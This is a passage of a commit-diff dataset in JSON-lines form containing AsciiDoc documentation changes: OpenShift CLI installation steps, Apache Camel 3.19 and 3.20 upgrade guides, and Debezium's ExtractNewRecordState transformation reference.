from a\ncommand-line interface. You can install `oc` on Linux, Windows, or macOS.\n\n[IMPORTANT]\n====\nIf you installed an earlier version of `oc`, you cannot use it to complete all\nof the commands in {product-title} {product-version}. Download and\ninstall the new version of `oc`.\nifdef::restricted[]\nIf you are upgrading a cluster in a restricted network, install the `oc` version that you plan to upgrade to.\nendif::restricted[]\n====\n\n[discrete]\n== Installing the OpenShift CLI on Linux\n\nYou can install the OpenShift CLI (`oc`) binary on Linux by using the following procedure.\n\n.Procedure\n\nifdef::openshift-origin[]\n. Navigate to https:\/\/mirror.openshift.com\/pub\/openshift-v4\/clients\/oc\/latest\/ and choose the folder for your operating system and architecture.\n. Download `oc.tar.gz`.\nendif::[]\nifndef::openshift-origin[]\n. Navigate to the link:https:\/\/access.redhat.com\/downloads\/content\/290[{product-title} downloads page] on the Red Hat Customer Portal.\n. Select the appropriate version in the *Version* drop-down menu.\n. Click *Download Now* next to the *OpenShift v{product-version} Linux Client* entry and save the file.\nendif::[]\n. Unpack the archive:\n+\n[source,terminal]\n----\n$ tar xvzf <file>\n----\n. Place the `oc` binary in a directory that is on your `PATH`.\n+\nTo check your `PATH`, execute the following command:\n+\n[source,terminal]\n----\n$ echo $PATH\n----\n\nAfter you install the OpenShift CLI, it is available using the `oc` command:\n\n[source,terminal]\n----\n$ oc <command>\n----\n\n[discrete]\n== Installing the OpenShift CLI on Windows\n\nYou can install the OpenShift CLI (`oc`) binary on Windows by using the following procedure.\n\n.Procedure\n\nifdef::openshift-origin[]\n. Navigate to https:\/\/mirror.openshift.com\/pub\/openshift-v4\/clients\/oc\/latest\/ and choose the folder for your operating system and architecture.\n. Download `oc.zip`.\nendif::[]\nifndef::openshift-origin[]\n. Navigate to the link:https:\/\/access.redhat.com\/downloads\/content\/290[{product-title} downloads page] on the Red Hat Customer Portal.\n. Select the appropriate version in the *Version* drop-down menu.\n. Click *Download Now* next to the *OpenShift v{product-version} Windows Client* entry and save the file.\nendif::[]\n. Unzip the archive with a ZIP program.\n. Move the `oc` binary to a directory that is on your `PATH`.\n+\nTo check your `PATH`, open the command prompt and execute the following command:\n+\n[source,terminal]\n----\nC:\\> path\n----\n\nAfter you install the OpenShift CLI, it is available using the `oc` command:\n\n[source,terminal]\n----\nC:\\> oc <command>\n----\n\n[discrete]\n== Installing the OpenShift CLI on macOS\n\nYou can install the OpenShift CLI (`oc`) binary on macOS by using the following procedure.\n\n.Procedure\n\nifdef::openshift-origin[]\n. Navigate to https:\/\/mirror.openshift.com\/pub\/openshift-v4\/clients\/oc\/latest\/ and choose the folder for your operating system and architecture.\n. Download `oc.tar.gz`.\nendif::[]\nifndef::openshift-origin[]\n. Navigate to the link:https:\/\/access.redhat.com\/downloads\/content\/290[{product-title} downloads page] on the Red Hat Customer Portal.\n. Select the appropriate version in the *Version* drop-down menu.\n. Click *Download Now* next to the *OpenShift v{product-version} MacOSX Client* entry and save the file.\nendif::[]\n. Unpack and unzip the archive.\n. Move the `oc` binary to a directory on your PATH.\n+\nTo check your `PATH`, open a terminal and execute the following command:\n+\n[source,terminal]\n----\n$ echo $PATH\n----\n\nAfter you install the OpenShift CLI, it is available using the `oc` command:\n\n[source,terminal]\n----\n$ oc <command>\n----\n\n\nifeval::[\"{context}\" == \"updating-restricted-network-cluster\"]\n:!restricted:\nendif::[]\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * cli_reference\/openshift_cli\/getting-started.adoc\n\/\/ * installing\/installing_aws\/installing-aws-user-infra.adoc\n\/\/ * installing\/installing_aws\/installing-aws-customizations.adoc\n\/\/ * installing\/installing_aws\/installing-aws-default.adoc\n\/\/ * installing\/installing_aws\/installing-aws-government-region.adoc\n\/\/ * installing\/installing_aws\/installing-aws-network-customizations.adoc\n\/\/ * installing\/installing_aws\/installing-aws-private.adoc\n\/\/ * installing\/installing_aws\/installing-aws-vpc.adoc\n\/\/ * installing\/installing_aws\/installing-restricted-networks-aws-installer-provisioned.adoc\n\/\/ * installing\/installing_azure\/installing-azure-customizations.adoc\n\/\/ * installing\/installing_azure\/installing-azure-default.adoc\n\/\/ * installing\/installing_azure\/installing-azure-government-region.adoc\n\/\/ * installing\/installing_azure\/installing-azure-private.adoc\n\/\/ * installing\/installing_azure\/installing-azure-vnet.adoc\n\/\/ * installing\/installing_azure\/installing-azure-user-infra.adoc\n\/\/ * installing\/installing_bare_metal\/installing-bare-metal.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-customizations.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-private.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-default.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-vpc.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-user-infra.adoc\n\/\/ * installing\/installing_gcp\/installing-restricted-networks-gcp-installer-provisioned.adoc\n\/\/ * installing\/install_config\/installing-restricted-networks-preparations.adoc\n\/\/ * installing\/installing_vmc\/installing-vmc-user-infra.adoc\n\/\/ * installing\/installing_vmc\/installing-vmc.adoc\n\/\/ * installing\/installing_vmc\/installing-vmc-customizations.adoc\n\/\/ * installing\/installing_vmc\/installing-vmc-network-customizations.adoc\n\/\/ * installing\/installing_vmc\/installing-restricted-networks-vmc.adoc\n\/\/ * installing\/installing_vsphere\/installing-vsphere.adoc\n\/\/ * installing\/installing_vsphere\/installing-vsphere-installer-provisioned.adoc\n\/\/ * installing\/installing_vsphere\/installing-vsphere-installer-provisioned-customizations.adoc\n\/\/ * installing\/installing_vsphere\/installing-vsphere-installer-provisioned-network-customizations.adoc\n\/\/ * installing\/installing_vsphere\/installing-restricted-networks-installer-provisioned-vsphere.adoc\n\/\/ * installing\/installing_ibm_z\/installing-ibm-z.adoc\n\/\/ * openshift_images\/samples-operator-alt-registry.adoc\n\/\/ * installing\/installing_rhv\/installing-rhv-customizations.adoc\n\/\/ * installing\/installing_rhv\/installing-rhv-default.adoc\n\/\/ * updating\/updating-restricted-network-cluster.adoc\n\/\/\n\/\/ AMQ docs link to this; do not change anchor\n\nifeval::[\"{context}\" == \"updating-restricted-network-cluster\"]\n:restricted:\nendif::[]\n\n[id=\"cli-installing-cli_{context}\"]\n= Installing the OpenShift CLI by downloading the binary\n\nYou can install the OpenShift CLI (`oc`) to interact with {product-title} from a\ncommand-line interface. You can install `oc` on Linux, Windows, or macOS.\n\n[IMPORTANT]\n====\nIf you installed an earlier version of `oc`, you cannot use it to complete all\nof the commands in {product-title} {product-version}. Download and\ninstall the new version of `oc`.\nifdef::restricted[]\nIf you are upgrading a cluster in a restricted network, install the `oc` version that you plan to upgrade to.\nendif::restricted[]\n====\n\n[discrete]\n== Installing the OpenShift CLI on Linux\n\nYou can install the OpenShift CLI (`oc`) binary on Linux by using the following procedure.\n\n.Procedure\n\nifdef::openshift-origin[]\n. Navigate to https:\/\/mirror.openshift.com\/pub\/openshift-v4\/clients\/oc\/latest\/ and choose the folder for your operating system and architecture.\n. Download `oc.tar.gz`.\nendif::[]\nifndef::openshift-origin[]\n. Navigate to the link:https:\/\/cloud.redhat.com\/openshift\/install[Infrastructure Provider] page on the {cloud-redhat-com} site.\n. Select your infrastructure provider, and, if applicable, your installation type.\n. In the *Command line interface* section, select *Linux* from the drop-down menu and click *Download command-line tools*.\nendif::[]\n. Unpack the archive:\n+\n[source,terminal]\n----\n$ tar xvzf <file>\n----\n. Place the `oc` binary in a directory that is on your `PATH`.\n+\nTo check your `PATH`, execute the following command:\n+\n[source,terminal]\n----\n$ echo $PATH\n----\n\nAfter you install the CLI, it is available using the `oc` command:\n\n[source,terminal]\n----\n$ oc <command>\n----\n\n[discrete]\n== Installing the OpenShift CLI on Windows\n\nYou can install the OpenShift CLI (`oc`) binary on Windows by using the following procedure.\n\n.Procedure\n\nifdef::openshift-origin[]\n. Navigate to https:\/\/mirror.openshift.com\/pub\/openshift-v4\/clients\/oc\/latest\/ and choose the folder for your operating system and architecture.\n. Download `oc.zip`.\nendif::[]\nifndef::openshift-origin[]\n. Navigate to the link:https:\/\/cloud.redhat.com\/openshift\/install[Infrastructure Provider] page on the {cloud-redhat-com} site.\n. Select your infrastructure provider, and, if applicable, your installation type.\n. In the *Command line interface* section, select *Windows* from the drop-down menu and click *Download command-line tools*.\nendif::[]\n. Unzip the archive with a ZIP program.\n. Move the `oc` binary to a directory that is on your `PATH`.\n+\nTo check your `PATH`, open the command prompt and execute the following command:\n+\n[source,terminal]\n----\nC:\\> path\n----\n\nAfter you install the CLI, it is available using the `oc` command:\n\n[source,terminal]\n----\nC:\\> oc <command>\n----\n\n[discrete]\n== Installing the OpenShift CLI on macOS\n\nYou can install the OpenShift CLI (`oc`) binary on macOS by using the following procedure.\n\n.Procedure\n\nifdef::openshift-origin[]\n. Navigate to https:\/\/mirror.openshift.com\/pub\/openshift-v4\/clients\/oc\/latest\/ and choose the folder for your operating system and architecture.\n. Download `oc.tar.gz`.\nendif::[]\nifndef::openshift-origin[]\n. Navigate to the link:https:\/\/cloud.redhat.com\/openshift\/install[Infrastructure Provider] page on the {cloud-redhat-com} site.\n. Select your infrastructure provider, and, if applicable, your installation type.\n. In the *Command line interface* section, select *MacOS* from the drop-down menu and click *Download command-line tools*.\nendif::[]\n. Unpack and unzip the archive.\n. Move the `oc` binary to a directory on your PATH.\n+\nTo check your `PATH`, open a terminal and execute the following command:\n+\n[source,terminal]\n----\n$ echo $PATH\n----\n\nAfter you install the CLI, it is available using the `oc` command:\n\n[source,terminal]\n----\n$ oc <command>\n----\n\n\nifeval::[\"{context}\" == \"updating-restricted-network-cluster\"]\n:!restricted:\nendif::[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4ebc15a9954942810136535628f77768ef684e26","subject":"CAMEL-18031: camel-karaf - Upgrade to 4.4.1","message":"CAMEL-18031: camel-karaf - Upgrade to 4.4.1\n","repos":"cunningt\/camel,tadayosi\/camel,christophd\/camel,tadayosi\/camel,apache\/camel,cunningt\/camel,christophd\/camel,tadayosi\/camel,christophd\/camel,cunningt\/camel,cunningt\/camel,tadayosi\/camel,tadayosi\/camel,apache\/camel,apache\/camel,cunningt\/camel,apache\/camel,christophd\/camel,christophd\/camel,tadayosi\/camel,cunningt\/camel,apache\/camel,apache\/camel,christophd\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-3x-upgrade-guide-3_19.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-3x-upgrade-guide-3_19.adoc","new_contents":"= Apache Camel 3.x Upgrade Guide\n\nThis document is for helping you upgrade your Apache Camel application\nfrom Camel 3.x to 3.y. For example if you are upgrading Camel 3.0 to 3.2, then you should follow the guides\nfrom both 3.0 to 3.1 and 3.1 to 3.2.\n\n== Upgrading Camel 3.18 to 3.19\n\n=== camel-api\n\nAdded `addClassLoader` method to `org.apache.camel.spi.ClassResolver`.\n\nThe default TLS protocol is changed from `TLSv1.2` to `TLSv1.3` in Camel JSSE support.\n\n=== camel-ftp\n\nThe default TLS protocol is changed from `TLSv1.2` to `TLSv1.3`.\n\n=== camel-kafka\n\nUpdated the documentation to reflect the default TLS protocol in Kafka Clients running on JDK11+\nis `TLSv1.2,TLSv1.3` (prefer v1.3 but can fall back to v1.2).\n\n=== camel-netty \/ camel-netty-http\n\nThe default TLS protocol is changed from `TLSv1,TLSv1.1,TLSv1.2` to `TLSv1.2,TLSv1.3`.\n\n=== camel-yaml-dsl\n\nRemoved using `template` as a custom alias for `routeTemplate` or `route-template`.\n\nRemoved the `tod` custom alias for `toD` or `to-d`.\n\nA route template can now also define a `route` which allows specifying route\noptions that otherwise is not possible when using `from`.\n\nFor example, you can now disable stream-caching, as shown in the snippet below that are from a Kamelet:\n\n[source,yaml]\n----\nspec:\n template:\n route:\n stream-caching: false\n message-history: true\n from:\n uri: timer:tick\n parameters:\n period: \"{{period}}\"\n steps:\n - set-body:\n constant: \"{{message}}\"\n - set-header:\n name: \"Content-Type\"\n constant: \"{{contentType}}\"\n - to: kamelet:sink\n----\n\n=== camel-salesforce\n\nThe URI format for consumer operations has changed. All consumer URIs now use the `subscribe` operation. E.g., `salesforce:subscribe:<topic_name>`, `salesforce:subscribe:event\/<event_name>`, `salesforce:subscribe:data\/ChangeEvents`.\n\n=== camel-consul\n\nThe deprecated options were removed and should be replaced by the following options:\n\n|===\n|Deprecated |Replace with\n\n|`connectTimeoutMillis`\n|`connectTimeout`\n\n|`readTimeoutMillis`\n|`readTimeout`\n\n|`writeTimeoutMillis`\n|`writeTimeout`\n|===\n\n=== camel-google-bigquery-sql\n\nParameters in form of `@name` are extracted from the body or message and their type is preserved and translated into corresponding `com.google.cloud.bigquery.StandardSQLTypeName`. See the https:\/\/cloud.google.com\/java\/docs\/reference\/google-cloud-bigquery\/latest\/com.google.cloud.bigquery.QueryParameterValue[documentation] for more information. (Conversion to StandardSQLTypeName.STRING was used for each type before)\n\n\n=== camel-telegram\n\nThe component was migrated from the Async HTTP Client to the builtin HTTP client from Java 11 and newer. As such,\n* the parameter `clientConfig`, that received an `AsyncHTTPClientConfiguration` instance was removed\n* the parameter `client`, that received an `AsyncHttpClient` instance, was modified to receive a HTTPClient instance.\n\n\n=== xtokenize language\n\nThe xtokenize language has moved from `camel-xml-jaxp` to `camel-stax` JAR because\na stax parser was needed anyway to use the language.\n\n\n=== camel-karaf\n\nUpgraded from Karaf 4.3.x to Karaf 4.4.x, which requires JDK11+.\n","old_contents":"= Apache Camel 3.x Upgrade Guide\n\nThis document is for helping you upgrade your Apache Camel application\nfrom Camel 3.x to 3.y. For example if you are upgrading Camel 3.0 to 3.2, then you should follow the guides\nfrom both 3.0 to 3.1 and 3.1 to 3.2.\n\n== Upgrading Camel 3.18 to 3.19\n\n=== camel-api\n\nAdded `addClassLoader` method to `org.apache.camel.spi.ClassResolver`.\n\nThe default TLS protocol is changed from `TLSv1.2` to `TLSv1.3` in Camel JSSE support.\n\n=== camel-ftp\n\nThe default TLS protocol is changed from `TLSv1.2` to `TLSv1.3`.\n\n=== camel-kafka\n\nUpdated the documentation to reflect the default TLS protocol in Kafka Clients running on JDK11+\nis `TLSv1.2,TLSv1.3` (prefer v1.3 but can fall back to v1.2).\n\n=== camel-netty \/ camel-netty-http\n\nThe default TLS protocol is changed from `TLSv1,TLSv1.1,TLSv1.2` to `TLSv1.2,TLSv1.3`.\n\n=== camel-yaml-dsl\n\nRemoved using `template` as a custom alias for `routeTemplate` or `route-template`.\n\nRemoved the `tod` custom alias for `toD` or `to-d`.\n\nA route template can now also define a `route` which allows specifying route\noptions that otherwise is not possible when using `from`.\n\nFor example, you can now disable stream-caching, as shown in the snippet below that are from a Kamelet:\n\n[source,yaml]\n----\nspec:\n template:\n route:\n stream-caching: false\n message-history: true\n from:\n uri: timer:tick\n parameters:\n period: \"{{period}}\"\n steps:\n - set-body:\n constant: \"{{message}}\"\n - set-header:\n name: \"Content-Type\"\n constant: \"{{contentType}}\"\n - to: kamelet:sink\n----\n\n=== camel-salesforce\n\nThe URI format for consumer operations has changed. All consumer URIs now use the `subscribe` operation. E.g., `salesforce:subscribe:<topic_name>`, `salesforce:subscribe:event\/<event_name>`, `salesforce:subscribe:data\/ChangeEvents`.\n\n=== camel-consul\n\nThe deprecated options were removed and should be replaced by the following options:\n\n|===\n|Deprecated |Replace with\n\n|`connectTimeoutMillis`\n|`connectTimeout`\n\n|`readTimeoutMillis`\n|`readTimeout`\n\n|`writeTimeoutMillis`\n|`writeTimeout`\n|===\n\n=== camel-google-bigquery-sql\n\nParameters in form of `@name` are extracted from the body or message and their type is preserved and translated into corresponding `com.google.cloud.bigquery.StandardSQLTypeName`. See the https:\/\/cloud.google.com\/java\/docs\/reference\/google-cloud-bigquery\/latest\/com.google.cloud.bigquery.QueryParameterValue[documentation] for more information. (Conversion to StandardSQLTypeName.STRING was used for each type before)\n\n\n=== camel-telegram\n\nThe component was migrated from the Async HTTP Client to the builtin HTTP client from Java 11 and newer. As such,\n* the parameter `clientConfig`, that received an `AsyncHTTPClientConfiguration` instance was removed\n* the parameter `client`, that received an `AsyncHttpClient` instance, was modified to receive a HTTPClient instance.\n\n\n=== xtokenize language\n\nThe xtokenize language has moved from `camel-xml-jaxp` to `camel-stax` JAR because\na stax parser was needed anyway to use the language.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"785cd13664bf995d250faa988066ad3a80934363","subject":"CAMEL-18665: camel-core: JsseParameters should use the camel provided resource loader instead of its own","message":"CAMEL-18665: camel-core: JsseParameters should use the camel provided resource loader instead of its own\n","repos":"apache\/camel,tadayosi\/camel,tadayosi\/camel,christophd\/camel,christophd\/camel,tadayosi\/camel,christophd\/camel,apache\/camel,tadayosi\/camel,apache\/camel,christophd\/camel,tadayosi\/camel,apache\/camel,christophd\/camel,apache\/camel,christophd\/camel,tadayosi\/camel,apache\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-3x-upgrade-guide-3_20.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-3x-upgrade-guide-3_20.adoc","new_contents":"= Apache Camel 3.x Upgrade Guide\n\nThis document is for helping you upgrade your Apache Camel application\nfrom Camel 3.x to 3.y. For example if you are upgrading Camel 3.0 to 3.2, then you should follow the guides\nfrom both 3.0 to 3.1 and 3.1 to 3.2.\n\n== Upgrading Camel 3.19 to 3.20\n\n=== camel-api\n\nThe `org.apache.camel.support.jsse.SSLContextParameters` is now using `ResourceLoader` from `CamelContext`\nto load keystore and other resources in a standard way. Therefore, the `SSLContextParameters` now must have been pre-configured\nwith a `CamelContext` otherwise an exception is thrown.\n\n=== camel-jsonpath\n\nThere is a new option `unpackArray` that unpacks a single-element Json array, matched by a Jsonpath, into an object. This option is disabled by default (this behaviour was enabled by default in previous Camel versions). There is a new expression `jsonpathUnpack(String text, Class<?> resultType)` that makes use of this new option.\n\n","old_contents":"= Apache Camel 3.x Upgrade Guide\n\nThis document is for helping you upgrade your Apache Camel application\nfrom Camel 3.x to 3.y. For example if you are upgrading Camel 3.0 to 3.2, then you should follow the guides\nfrom both 3.0 to 3.1 and 3.1 to 3.2.\n\n== Upgrading Camel 3.19 to 3.20\n\n=== camel-jsonpath\n\nThere is a new option `unpackArray` that unpacks a single-element Json array, matched by a Jsonpath, into an object. This option is disabled by default (this behaviour was enabled by default in previous Camel versions). There is a new expression `jsonpathUnpack(String text, Class<?> resultType)` that makes use of this new option.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"09b40c4bb3b9a5d935af62ff169886a23a5dd410","subject":"DBZ-1452 Fix typo","message":"DBZ-1452 Fix typo\n","repos":"debezium\/debezium,debezium\/debezium,debezium\/debezium,jpechane\/debezium,debezium\/debezium,jpechane\/debezium,jpechane\/debezium,jpechane\/debezium","old_file":"documentation\/modules\/ROOT\/pages\/configuration\/event-flattening.adoc","new_file":"documentation\/modules\/ROOT\/pages\/configuration\/event-flattening.adoc","new_contents":"= New Record State Extraction\ninclude::..\/_attributes.adoc[]\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\ntoc::[]\n\n[NOTE]\n====\nThis SMT is supported only for the SQL database connectors, it does not work with the MongoDB connector.\nSee xref:configuration\/mongodb-event-flattening.adoc[here] for the MongoDB equivalent to this SMT.\n====\n\nDebezium generates data change events in a form of a complex message structure.\nEach event consists of three parts:\n\n* metadata, comprising the type of operation, information on the event source, a timestamp, and optionally transaction information\n* the row data before change\n* the row data after change\n\nE.g. the general message structure for an `update` change looks like this:\n\n[source,json,indent=0]\n----\n{\n\t\"op\": \"u\",\n\t\"source\": {\n\t\t...\n\t},\n\t\"ts_ms\" : \"...\",\n\t\"before\" : {\n\t\t\"field1\" : \"oldvalue1\",\n\t\t\"field2\" : \"oldvalue2\"\n\t},\n\t\"after\" : {\n\t\t\"field1\" : \"newvalue1\",\n\t\t\"field2\" : \"newvalue2\"\n\t}\n}\n----\n\nMore details about the message structure are provided in xref:connectors\/index.adoc[the documentation for each connector].\n\nThis format allows the user to get most information about changes happening in the system.\nThe downside of using the complex format is that other connectors or other parts of the Kafka ecosystem usually expect the data in a simple message format that can generally be described like so:\n\n[source,json,indent=0]\n----\n{\n\t\"field1\" : \"newvalue1\",\n\t\"field2\" : \"newvalue2\"\n}\n----\n\nDebezium provides https:\/\/kafka.apache.org\/documentation\/#connect_transforms[a single message transformation] that crosses the bridge between the complex and simple formats, the https:\/\/github.com\/debezium\/debezium\/blob\/master\/debezium-core\/src\/main\/java\/io\/debezium\/transforms\/ExtractNewRecordState.java[ExtractNewRecordState] SMT.\n\nThe SMT provides three main functions.\nIt\n\n* extracts the `after` field from change events and replaces the original event just with this part\n* optionally filters delete and tombstone records, as per the capabilities and requirements of downstream consumers\n* optionally adds metadata fields from the change event to the outgoing flattened record\n* optionally add metadata fields to the header\n\nThe SMT can be applied either to a source connector (Debezium) or a sink connector.\nWe generally recommend to apply the transformation on the sink side as it means that the messages stored in Apache Kafka will contain the whole context.\nThe final decision depends on use case for each user.\n\n== Configuration\nThe configuration is a part of source\/sink task connector and is expressed in a set of properties:\n\n[source]\n----\ntransforms=unwrap,...\ntransforms.unwrap.type=io.debezium.transforms.ExtractNewRecordState\ntransforms.unwrap.drop.tombstones=false\ntransforms.unwrap.delete.handling.mode=rewrite\ntransforms.unwrap.add.source.fields=table,lsn\n----\n\n=== Record filtering for delete records\n\nThe SMT provides a special handling for events that signal a `delete` operation.\nWhen a `DELETE` is executed on a datasource then Debezium generates two events:\n\n* a record with `d` operation that contains only old row data\n* (optionally) a record with `null` value and the same key (a \"tombstone\" message). This record serves as a marker for Apache Kafka that all messages with this key can be removed from the topic during https:\/\/kafka.apache.org\/documentation\/#compaction[log compaction].\n\nUpon processing these two records, the SMT can pass on the `d` record as is,\nconvert it into another tombstone record or drop it.\nThe original tombstone message can be passed on as is or also be dropped.\n\n[NOTE]\n====\nThe SMT by default filters out *both* delete records as widely used sink connectors do not support handling of tombstone messages at this point.\n====\n\n=== Adding metadata fields to the message\n\nThe SMT can optionally add metadata fields from the original change event to the final flattened record. This functionality can be used to add things like the operation or the table from the change event, or connector-specific fields like the Postgres LSN field. For more information on what's available see xref:connectors\/index.adoc[the documentation for each connector].\n\nIn case of duplicate field names (e.g. \"ts_ms\" exists twice), the struct should be specified to get the correct field (e.g. \"source.ts_ms\"). The fields will be prefixed with \"\\\\__\" or \"__<struct>_\", depending on the specification of the struct. Please use a comma separated list without spaces.\n\nFor example, the configuration\n\n----\ntransforms=unwrap,...\ntransforms.unwrap.type=io.debezium.transforms.ExtractNewRecordState\ntransforms.unwrap.add.fields=op,table,lsn,source.ts_ms\n----\n\nwill add\n\n----\n{ \"__op\" : \"c\", __table\": \"MY_TABLE\", \"__lsn\": \"123456789\", \"__source_ts_ms\" : \"123456789\", ...}\n----\n\nto the final flattened record.\n\nFor `DELETE` events, this option is only supported when the `delete.handling.mode` option is set to \"rewrite\".\n\n=== Adding metadata fields to the header\n\nThe SMT can optionally add metadata fields from the original change event to the header of the final flattened record. This functionality can be used to add things like the operation or the table from the change event, or connector-specific fields like the Postgres LSN field. For more information on what's available see xref:connectors\/index.adoc[the documentation for each connector].\n\nIn case of duplicate field names (e.g. \"ts_ms\" exists twice), the struct should be specified to get the correct field (e.g. \"source.ts_ms\"). The fields will be prefixed with \"\\\\__\" or \"__<struct>_\", depending on the specification of the struct. Please use a comma separated list without spaces.\n\nFor example, the configuration\n\n----\ntransforms=unwrap,...\ntransforms.unwrap.type=io.debezium.transforms.ExtractNewRecordState\ntransforms.unwrap.add.headers=op,table,lsn,source.ts_ms\n----\n\nwill add headers `__op`, `__table`, `__lsn` and `__source_ts_ms` to the outgoing record.\n\n=== Determine original operation [DEPRECATED]\n\n_The `operation.header` option is deprecated and scheduled for removal. Please use add.headers instead. If both add.headers and operation.header are specified, the latter will be ignored._\n\nWhen a message is flattened the final result won't show whether it was an insert, update or first read\n(deletions can be detected via tombstones or rewrites, see link:#configuration_options[Configuration options]).\n\nTo solve this problem Debezium offers an option to propagate the original operation via a header added to the message.\nTo enable this feature the option `operation.header` must be set to `true`.\n\n[source]\n----\ntransforms=unwrap,...\ntransforms.unwrap.type=io.debezium.transforms.ExtractNewRecordState\ntransforms.unwrap.operation.header=true\n----\n\nThe possible values are the ones from the `op` field of the original change event.\n\n=== Adding source metadata fields [DEPRECATED]\n\n_The `add.source.fields` option is deprecated and scheduled for removal. Please use add.fields instead. If both add.fields and add.source.fields are specified, the latter will be ignored._\n\nThe SMT can optionally add metadata fields from the original change event's `source` structure to the final flattened record (prefixed with \"__\"). This functionality can be used to add things like the table from the change event, or connector-specific fields like the Postgres LSN field. For more information on what's available in the source structure see xref:connectors\/index.adoc[the documentation for each connector].\n\nFor example, the configuration\n\n----\ntransforms=unwrap,...\ntransforms.unwrap.type=io.debezium.transforms.ExtractNewRecordState\ntransforms.unwrap.add.source.fields=table,lsn\n----\n\nwill add\n\n----\n{ \"__table\": \"MY_TABLE\", \"__lsn\": \"123456789\", ...}\n----\n\nto the final flattened record.\n\nFor `DELETE` events, this option is only supported when the `delete.handling.mode` option is set to \"rewrite\".\n\n[[configuration_options]]\n== Configuration options\n[cols=\"35%a,10%a,55%a\",options=\"header\"]\n|=======================\n|Property\n|Default\n|Description\n\n|`drop.tombstones`\n|`true`\n|The SMT removes the tombstone generated by Debezium from the stream.\n\n|`delete.handling.mode`\n|`drop`\n|The SMT can `drop` (the default), `rewrite` or pass delete events (`none`). The rewrite mode will add a `__deleted` column with true\/false values based on record operation.\n\n\n|`route.by.field`\n|\n|The column which determines how the events will be routed, the value will the topic name; obtained from the old record state for delete events, and from the new record state otherwise\n\n|`add.fields`\n|\n|Specify a list of metadata fields to add to the flattened message. In case of duplicate field names (e.g. \"ts_ms\" exists twice), the struct should be specified to get the correct field (e.g. \"source.ts_ms\"). The fields will be prefixed with \"\\\\__\" or \"__<struct>__\", depending on the specification of the struct. Please use a comma separated list without spaces.\n\n|`add.headers`\n|\n|Specify a list of metadata fields to add to the header of the flattened message. In case of duplicate field names (e.g. \"ts_ms\" exists twice), the struct should be specified to get the correct field (e.g. \"source.ts_ms\"). The fields will be prefixed with \"\\\\__\" or \"__<struct>__\", depending on the specification of the struct. Please use a comma separated list without spaces.\n\n|`operation.header` DEPRECATED\n|`false`\n|_This option is deprecated and scheduled for removal. Please use add.headers instead. If both add.headers and operation.header are specified, the latter will be ignored._ \n\nThe SMT adds the event operation (as obtained from the `op` field of the original record) as a message header.\n\n|`add.source.fields` DEPRECATED\n|\n|_This option is deprecated and scheduled for removal. Please use add.fields instead. If both add.fields and add.source.fields are specified, the latter will be ignored._\n\nFields from the change event's `source` structure to add as metadata (prefixed with \"__\") to the flattened record. Please no\n|=======================\n","old_contents":"= New Record State Extraction\ninclude::..\/_attributes.adoc[]\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\ntoc::[]\n\n[NOTE]\n====\nThis SMT is supported only for the SQL database connectors, it does not work with the MongoDB connector.\nSee xref:configuration\/mongodb-event-flattening.adoc[here] for the MongoDB equivalent to this SMT.\n====\n\nDebezium generates data change events in a form of a complex message structure.\nEach events consists of three parts:\n\n* metadata, comprising the type of operation, information on the event source, a timestamp, and optionally transaction information\n* the row data before change\n* the row data after change\n\nE.g. the general message structure for an `update` change looks like this:\n\n[source,json,indent=0]\n----\n{\n\t\"op\": \"u\",\n\t\"source\": {\n\t\t...\n\t},\n\t\"ts_ms\" : \"...\",\n\t\"before\" : {\n\t\t\"field1\" : \"oldvalue1\",\n\t\t\"field2\" : \"oldvalue2\"\n\t},\n\t\"after\" : {\n\t\t\"field1\" : \"newvalue1\",\n\t\t\"field2\" : \"newvalue2\"\n\t}\n}\n----\n\nMore details about the message structure are provided in xref:connectors\/index.adoc[the documentation for each connector].\n\nThis format allows the user to get most information about changes happening in the system.\nThe downside of using the complex format is that other connectors or other parts of the Kafka ecosystem usually expect the data in a simple message format that can generally be described like so:\n\n[source,json,indent=0]\n----\n{\n\t\"field1\" : \"newvalue1\",\n\t\"field2\" : \"newvalue2\"\n}\n----\n\nDebezium provides https:\/\/kafka.apache.org\/documentation\/#connect_transforms[a single message transformation] that crosses the bridge between the complex and simple formats, the https:\/\/github.com\/debezium\/debezium\/blob\/master\/debezium-core\/src\/main\/java\/io\/debezium\/transforms\/ExtractNewRecordState.java[ExtractNewRecordState] SMT.\n\nThe SMT provides three main functions.\nIt\n\n* extracts the `after` field from change events and replaces the original event just with this part\n* optionally filters delete and tombstone records, as per the capabilities and requirements of downstream consumers\n* optionally adds metadata fields from the change event to the outgoing flattened record\n* optionally add metadata fields to the header\n\nThe SMT can be applied either to a source connector (Debezium) or a sink connector.\nWe generally recommend to apply the transformation on the sink side as it means that the messages stored in Apache Kafka will contain the whole context.\nThe final decision depends on use case for each user.\n\n== Configuration\nThe configuration is a part of source\/sink task connector and is expressed in a set of properties:\n\n[source]\n----\ntransforms=unwrap,...\ntransforms.unwrap.type=io.debezium.transforms.ExtractNewRecordState\ntransforms.unwrap.drop.tombstones=false\ntransforms.unwrap.delete.handling.mode=rewrite\ntransforms.unwrap.add.source.fields=table,lsn\n----\n\n=== Record filtering for delete records\n\nThe SMT provides a special handling for events that signal a `delete` operation.\nWhen a `DELETE` is executed on a datasource then Debezium generates two events:\n\n* a record with `d` operation that contains only old row data\n* (optionally) a record with `null` value and the same key (a \"tombstone\" message). This record serves as a marker for Apache Kafka that all messages with this key can be removed from the topic during https:\/\/kafka.apache.org\/documentation\/#compaction[log compaction].\n\nUpon processing these two records, the SMT can pass on the `d` record as is,\nconvert it into another tombstone record or drop it.\nThe original tombstone message can be passed on as is or also be 